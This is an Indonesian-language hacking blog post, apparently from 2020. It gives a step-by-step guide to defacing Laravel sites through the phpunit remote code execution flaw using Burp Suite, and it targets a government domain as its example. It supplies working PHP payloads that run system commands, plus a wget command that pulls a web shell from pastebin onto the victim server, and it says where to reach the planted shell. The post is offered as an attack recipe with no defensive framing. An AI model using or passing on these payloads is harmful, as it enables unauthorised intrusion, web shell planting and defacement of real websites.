Laravel phpunit rce - https://lyxa-gov.blogspot.com

lyxa-gov April 13, 2020


Deface Laravel Phpunit Rce
Yoo Sobb...... Yang Kalian Butuhkan Hanya...
- Burpsuite, Web Target, Shell Tentunya

 Ok Langsung Aja Sobb......
Kita Buka Burpsuitenya Terlebih Dahulu Dan Masukkan Web Target Pada Browser Sambil Interceptmya Di Nyalain Di Burpsuitenya

Oke Jika Muncul Seperti Itu Kita Langsung Klik Kanan Dan Pilih Repeater Atau Pencet CTRL + R



Setelah Masuk Ke Repeater Kalian Masukkan Perintah Di Paling Bawah Seperti Ini

Example :
<?php system('id'); ?>
Jika muncul seperti di kanan itu tulisan maka bisa di ekse sob

id itu adalah command Linux jadi kalian bisa mengubah id menjadi command Linux misalnya ls,cd,wget,curl dan lainnya untuk spawn Shell kalian masukkan perintah seperti ini :

<?php system('wget https://linkshell.com/namashell.txt -O namainshellnya.php'); ?>

Example :
<?php system ('wget https://pastebin.com/raw/inATWV4R -O shell.php')

Dan Kalian Klik Send, Lalu Kalian Matikan Interceptnya Kemudian Kalian Coba Akses

https://site.gov/vendor/phpunit/phpunit/src/Util/PHP/namashell.php

Karena disini saya cuman mau nitip file .txt aja ya jadinya seperti ini




Dan Ok Thanks -
###########################
Deface Laravel phpunit rce
Deface
Laravel phpunit rce
Deface dengan Linux
Deface 2020
Deface teknik baru
Deface methode Laravel
Deface rce
Rce
Phpunit rce
lyxa.gov

Posting Komentar

0 Komentar

Microsoft Sql Server Remote Code Execution Vulnerability CVE-2020-0618

Microsoft Sql Server Remote Code Execution Vulnerability CVE-2020-0618

lyxa-govSeptember 18, 2020

Microsoft Sql Server Remote Code Execution Vulnerability CVE-2020-0618 https://www.exploit-db.com/…

Baca selengkapnya